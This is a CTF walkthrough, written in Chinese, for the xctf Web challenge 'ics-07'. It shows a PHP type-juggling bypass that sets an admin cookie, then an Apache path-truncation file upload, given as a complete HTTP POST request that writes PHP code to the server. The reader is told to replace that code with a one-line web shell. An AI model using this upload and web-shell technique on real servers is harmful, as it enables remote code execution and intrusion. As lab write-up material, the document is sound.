# xctf Web

## ics-07

`!==`会判断类型，id加入字母，如id=1x9就满足if条件添加admin cookie

发包观察到服务器为apache 2.4.7，可能有解析漏洞，https://www.cnblogs.com/yokan/p/12444476.html总结了IIS、apache和Nginx的解析漏洞。

![](https://typora-202017030217.oss-cn-beijing.aliyuncs.com/typora/image-20240625090842268.png)

除上文博客以外，apache还有Apache换行解析漏洞（CVE-2017-15715），影响范围：2.4.0-2.4.29版本

以及本题目的目录截断解析漏洞，可以上传如下的数据包（需要你自己先传?page=1&id=1x9获取cookie再抓包，不然cookie不一样），然后访问upload/backup/1.php路径

```http
POST /view-source.php?page=1&id=1x9 HTTP/1.1
Host: 61.147.171.105:53412
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=899ssdclsgusrtgu33r3f3j745
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

con=<?php phpinfo();?>&file=1.php/.
```

或者上传文件名为`1.php/shell.php/..`，然后访问1.php

请自行把con内容修改为一句话马，shell连不上就直接hackbar post，flag在源代码里

![](https://typora-202017030217.oss-cn-beijing.aliyuncs.com/typora/image-20240625100442464.png)

![](https://typora-202017030217.oss-cn-beijing.aliyuncs.com/typora/image-20240625100531107.png)